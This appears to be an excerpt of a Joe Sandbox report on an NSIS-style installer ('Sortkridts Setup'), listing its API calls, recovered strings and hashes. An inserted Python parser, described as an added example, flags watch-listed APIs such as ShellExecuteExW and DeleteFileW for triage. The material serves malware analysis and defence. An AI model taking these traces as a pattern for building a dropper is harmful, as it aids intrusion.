                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                • Instruction ID: 66eca0b878d1a88cf031bc7713e4e99cd100193794d0d0043917bcbbabee6758
                                • Opcode Fuzzy Hash: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                • Instruction Fuzzy Hash: 37D0EC61414150E9D1606F718D49ABA736DAF05354F204A3EF196E10D1EAB85501932F
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                • Instruction ID: d4ac7d1497c90a7860cde27ccfdf49f9d4c0c6eb7f3b7e6fe9b2edbc2c979ebe
                                • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                • Instruction Fuzzy Hash: 79C15B71A0C3918FD364CF29C48036ABBE1FBC5304F10892EE5DA9B391D678A546CB5B
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAC
                                • ShowWindow.USER32(?), ref: 00404FD6
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FE7
                                • ShowWindow.USER32(?,00000004), ref: 00405003
                                • GetDlgItem.USER32(?,00000001), ref: 0040512A
                                • GetDlgItem.USER32(?,00000002), ref: 00405134
                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040514E
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519C
                                • GetDlgItem.USER32(?,00000003), ref: 0040524B
                                • ShowWindow.USER32(00000000,?), ref: 00405274
                                • EnableWindow.USER32(?,?), ref: 00405288
                                • EnableWindow.USER32(?), ref: 0040529C
                                • EnableWindow.USER32(?), ref: 004052B4
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CB
                                • EnableMenuItem.USER32(00000000), ref: 004052D2
                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E3
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FA
                                • lstrlenW.KERNEL32(004211D0,?,004211D0,00000000), ref: 0040532B
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                • SetWindowTextW.USER32(?,004211D0), ref: 00405343
                                  • Part of subcall function 00401399: MulDiv.KERNEL32(00000000,00007530,00000000), ref: 004013F9
                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                • DestroyWindow.USER32(?,00000000), ref: 0040538B
                                • CreateDialogParamW.USER32(?,?,FFBD62DF), ref: 004053BF
                                  • Part of subcall function 004054F5: SetDlgItemTextW.USER32(?,?,00000000), ref: 0040550F
                                • GetDlgItem.USER32(?,000003FA), ref: 004053E8
                                • GetWindowRect.USER32(00000000), ref: 004053EF
                                • ScreenToClient.USER32(?,?), ref: 004053FB
                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405414
                                • ShowWindow.USER32(00000008,?,00000000), ref: 00405433
                                  • Part of subcall function 004054C3: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004054D5
                                • ShowWindow.USER32(?,0000000A), ref: 00405479
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$Enable$LongMenuText$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                • String ID:
                                • API String ID: 3304020681-0
                                • Opcode ID: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction ID: 1b19c71cd4f81cfbd26a1cf5418529817e88c436646d4b9e8708edd60e3e664c
                                • Opcode Fuzzy Hash: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction Fuzzy Hash: C4D1C070601A11AFDB206F21ED48A6B7BA8FB48355F40453EF945B21F0CB399852DFAD
                                APIs
                                • CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
                                • EnableWindow.USER32(?), ref: 00403E11
                                • GetDlgItem.USER32(?,000003E8), ref: 00403E1D
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E39
                                • GetSysColor.USER32(?), ref: 00403E4A
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E58
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E66
                                • lstrlenW.KERNEL32(?), ref: 00403E6C
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E79
                                • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403E90
                                • GetDlgItem.USER32(?,0000040A), ref: 00403EEC
                                • SendMessageW.USER32(00000000), ref: 00403EF3
                                • EnableWindow.USER32(00000000), ref: 00403F10
                                • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F34
                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403F89
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00403F9B
                                • SetCursor.USER32(00000000), ref: 00403FA4
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00403FE6
                                • SetCursor.USER32(00000000), ref: 00403FE9
                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404015
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040402D
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                • String ID: Call$N
                                • API String ID: 3270077613-3438112850
                                • Opcode ID: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction ID: 4fa98256382c23a77b640614663c001b7206c978ba46bfa2c34382a940cfe240
                                • Opcode Fuzzy Hash: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction Fuzzy Hash: A881B0B1604308AFD710AF24DD44A6B7BE9FF88345F41083EF641A72A1CB789945CF59
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                • BeginPaint.USER32(?,?), ref: 0040104C
                                • GetClientRect.USER32(?,?), ref: 00401062
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                • DeleteObject.GDI32(00000000), ref: 004010FA
                                • CreateFontIndirectW.GDI32(?), ref: 00401120
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401143
                                • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                • DrawTextW.USER32(00000000,Sortkridts Setup,000000FF,?,00000820), ref: 00401171
                                • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                • DeleteObject.GDI32(?), ref: 0040117F
                                • EndPaint.USER32(?,?), ref: 0040118E
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F$Sortkridts Setup
                                • API String ID: 941294808-185700202
                                • Opcode ID: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction ID: d36771556e1314171d00f7341d5a6d6cd4ef22ea24e197e6f7dda2bcd3f0aae3
                                • Opcode Fuzzy Hash: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction Fuzzy Hash: 3041AD720083509FC7159F65CE4896BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6
                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,00406239,?,?), ref: 0040631C
                                • GetShortPathNameW.KERNEL32(00000000,00426E48,00000400), ref: 00406325
                                • GetShortPathNameW.KERNEL32(?,00426648,00000400), ref: 00406342
                                • wsprintfA.USER32 ref: 00406360
                                • GetFileSize.KERNEL32(00000000,00000000,00426648,C0000000,00000004,00426648,?), ref: 00406398
                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063A8
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063D8
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
                                • GlobalFree.KERNEL32(00000000), ref: 0040640A
                                • CloseHandle.KERNEL32(00000000), ref: 00406411
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %ls=%ls$HfB$HnB$[Rename]
                                • API String ID: 2900126502-165592708
                                • Opcode ID: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                • Instruction ID: 28d4088f706ad7906ef0a9a5075647bec21de1d5f4d95c1c1de34b852c29caff
                                • Opcode Fuzzy Hash: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                • Instruction Fuzzy Hash: 9431E5B12002217BD6206B359D49F7B3A5CDF81748F56443EF942BA2C2DA7DD8624A7C
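                                 The per-function listings in this section share one line grammar: a bullet, an optional "Part of subcall function XXXXXXXX:" prefix for calls made from a callee, then Api.MODULE(args) and ", ref: address", where the address is a virtual address in the dumped image (base 00400000 per the Memory Dump Source line). In a report this long it is quicker to parse those lines than to read them. The parser below is an added example written for this page, not Joe Sandbox code; the grammar is inferred from the visible lines and is an assumption, the WATCHLIST set is the editor's choice, and SAMPLE is constructed from lines that appear in this section.

```python
"""Parse Joe Sandbox per-function API listing lines into records for triage.

Added example, not part of the report or of Joe Sandbox tooling. The line
grammar (API_LINE) is an assumption inferred from the lines on this page.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Assumed grammar of one listing line, derived from the report's own lines.
API_LINE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Editor's choice of APIs worth a second look in an installer/dropper stub.
WATCHLIST = {"ShellExecuteExW", "CreateFileW", "DeleteFileW",
             "SetFilePointer", "GetShortPathNameW"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                       # call-site VA in the dumped image
    args: List[Union[int, str, None]]
    parent: Optional[int] = None   # set for 'Part of subcall function' lines


def parse_arg(tok: str) -> Union[int, str, None]:
    """'?' is an unresolved value; an 8-hex-digit token (optionally negative)
    is numeric; anything else is a recovered string literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX_ARG.match(tok):
        return int(tok, 16)
    return tok


def parse_api_listing(text: str) -> List[ApiCall]:
    """Return one ApiCall per matching line; headers such as 'APIs',
    'Strings' or 'Similarity' do not match and are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Caveat: args are split on commas; a string literal that itself
        # contains a comma would be split (none occurs in this report).
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        parent = m.group("parent")
        calls.append(ApiCall(api=m.group("api"), module=m.group("module"),
                             ref=int(m.group("ref"), 16), args=args,
                             parent=int(parent, 16) if parent else None))
    return calls


def watchlist_hits(calls: List[ApiCall]):
    """(api, call-site) pairs for APIs on the watch list."""
    return [(c.api, f"{c.ref:08X}") for c in calls if c.api in WATCHLIST]


def string_args(calls: List[ApiCall]) -> List[str]:
    """Every string literal the plugin recovered as an argument, in order,
    deduplicated; handy for spotting installer/stub fingerprints."""
    seen: List[str] = []
    for c in calls:
        for a in c.args:
            if isinstance(a, str) and a not in seen:
                seen.append(a)
    return seen


# Constructed sample: lines copied from this section of the report.
SAMPLE = """\
APIs
• CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
• wsprintfA.USER32 ref: 00406360
  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
• DrawTextW.USER32(00000000,Sortkridts Setup,000000FF,?,00000820), ref: 00401171
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
Strings
"""

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for hit in watchlist_hits(parsed):
        print("watchlist:", hit)
    print("strings:", string_args(parsed))
```

                                 Run it over the whole listing (paste the section into SAMPLE or read it from a file) and the watch-list hits give you the call sites to open in the dump first; string_args pulls out recovered literals such as "[Rename]" and the temp-folder error text without scrolling past the repeated dump metadata.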
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                • GlobalFree.KERNEL32(?), ref: 00402C7E
                                • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll, xrefs: 00402CD3
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 2667972263-204022868
                                • Opcode ID: 6ffc5b8a9f87e2e5b40759ba5e904c63f1369c7a02dc5e0df68b7fff71cda799
                                • Instruction ID: 686b8f33fe839f6b04a80afc83e47d853b1ea01e990ec980acb486ddfed3f61f
                                • Opcode Fuzzy Hash: 6ffc5b8a9f87e2e5b40759ba5e904c63f1369c7a02dc5e0df68b7fff71cda799
                                • Instruction Fuzzy Hash: 1E310871408351ABD310AF658E49E1FBBE8AF89754F114A3EF590772D2C77888018B9A
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406D8D
                                • CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DA1
                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DB9
                                Strings
                                • *?|<>/":, xrefs: 00406D7C
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D1F
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D18, 00406D1A
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                • API String ID: 589700163-2188270913
                                • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction ID: 6d5cd2c23b7c5e8a6660ed42317bbe46aa043e331069955b4164b8205da208bc
                                • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction Fuzzy Hash: 9E11D261B0063556DA3067298C4097B72E8DFA97A1756443BFDC6E72C0FB7C8CA193AC
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction ID: fd6d678b7fcced70b4665a1fbec2e56912b3eb02c270adc19d2dd25120f6a122
                                • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction Fuzzy Hash: 4B21F675500B04DFDB749F28DA4895B77B4EF05710B108A3EE896B26A1DB38E814CF24
                                APIs
                                • lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                • lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                • lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                • SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                • SendMessageW.USER32(00000000), ref: 00405DB3
                                • SendMessageW.USER32(00000000,0000104D,00000000,?), ref: 00405DCE
                                • SendMessageW.USER32(00000000,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                • String ID:
                                • API String ID: 1759915248-0
                                • Opcode ID: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction ID: ac3c7827115ee855a696472e6a70c5e4fb7cac6e51cf912ccc90d208c1262af9
                                • Opcode Fuzzy Hash: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction Fuzzy Hash: 7B21F571A056206BD310AF55AC84A9BBBDCEF94350F44443FF548A3291C7B89D008AAD
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056CE
                                • GetMessagePos.USER32 ref: 004056D6
                                • ScreenToClient.USER32(?,?), ref: 004056F0
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405704
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040572C
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction ID: 0216f53b5c1e39ec49102949a755e2bc9d8ef7e3372eb4174345f74bd41e4177
                                • Opcode Fuzzy Hash: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction Fuzzy Hash: C3014C7194020DBBEB01AF94CD45BEEBBB9EF44710F10412AFA50BA1E0C7B49A41DF54
                                APIs
                                • GetDC.USER32 ref: 00401FB9
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                • CreateFontIndirectW.GDI32(0040C8C8), ref: 00402037
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                • String ID: Times New Roman
                                • API String ID: 4253744674-927190056
                                • Opcode ID: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction ID: a293f1e503c12f3834b95d63be9809c732b55947eac1385e5f26d009a2b4f9be
                                • Opcode Fuzzy Hash: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction Fuzzy Hash: 5401D473144780EFD300BBB49E8AA563BE8EB55706F10893EF685B71E1C9784109CB2D
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00403648
                                • MulDiv.KERNEL32(000CAC30,00000064,000CAC30), ref: 00403670
                                • wsprintfW.USER32 ref: 00403680
                                • SetWindowTextW.USER32(?,?), ref: 00403690
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                                Strings
                                • verifying installer: %d%%, xrefs: 0040367A
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction ID: 23416ea20b8bc991085432565deaec88b6a19029d37e317e26b4fa0cf66bde53
                                • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction Fuzzy Hash: F7016D71540208FBEF24AFA0DE86FAA3B69AB04305F00853EF646B51E0DBB99554CF5D
                                APIs
                                  • Part of subcall function 6FC312F8: GlobalAlloc.KERNELBASE(00000040,?,6FC311C4,-000000A0), ref: 6FC31302
                                • GlobalFree.KERNEL32(00000000), ref: 6FC322F1
                                • GlobalFree.KERNEL32(00000000), ref: 6FC32326
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                 • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: 7b426cd6570a019916629c52efccb480e0c46297f702d7411f8f11a63442bb18
                                • Instruction ID: fd9b8fd9d2c0dc81b8dc0e2923542f6150261dda9c30724719930924a0cc2021
                                • Opcode Fuzzy Hash: 7b426cd6570a019916629c52efccb480e0c46297f702d7411f8f11a63442bb18
                                • Instruction Fuzzy Hash: 9431E433A04622DFDF258F69CD64EAA77B9FF863A5B000569F601C6190E7339464CBE0
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC3116B
                                • GlobalFree.KERNEL32(00000000), ref: 6FC311AE
                                • GlobalFree.KERNEL32(00000000), ref: 6FC311CD
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC311E6
                                • GlobalFree.KERNEL32 ref: 6FC3125C
                                • GlobalFree.KERNEL32(?), ref: 6FC312A7
                                • GlobalFree.KERNEL32(00000000), ref: 6FC312BF
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                 • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: ebefbb6a343c2502287e22e55665f98bb3f3fdaa7f1ca8f3b0dfa70ff1c0253d
                                • Instruction ID: 70b20797b23721dc8be0cc63d8d08b99e42d757b397979e6e685c84a6beb5260
                                • Opcode Fuzzy Hash: ebefbb6a343c2502287e22e55665f98bb3f3fdaa7f1ca8f3b0dfa70ff1c0253d
                                • Instruction Fuzzy Hash: 04518077E007229FCB20CF6DC980A6A77F4FF4A394B00492AEA45D7250E736E915CB91
                                APIs
                                • GlobalFree.KERNEL32(00000000), ref: 6FC321BF
                                  • Part of subcall function 6FC312E1: lstrcpynW.KERNEL32(00000000,?,6FC3156A,?,6FC311C4,-000000A0), ref: 6FC312F1
                                • GlobalAlloc.KERNEL32(00000040), ref: 6FC3212C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FC3214C
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                 • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
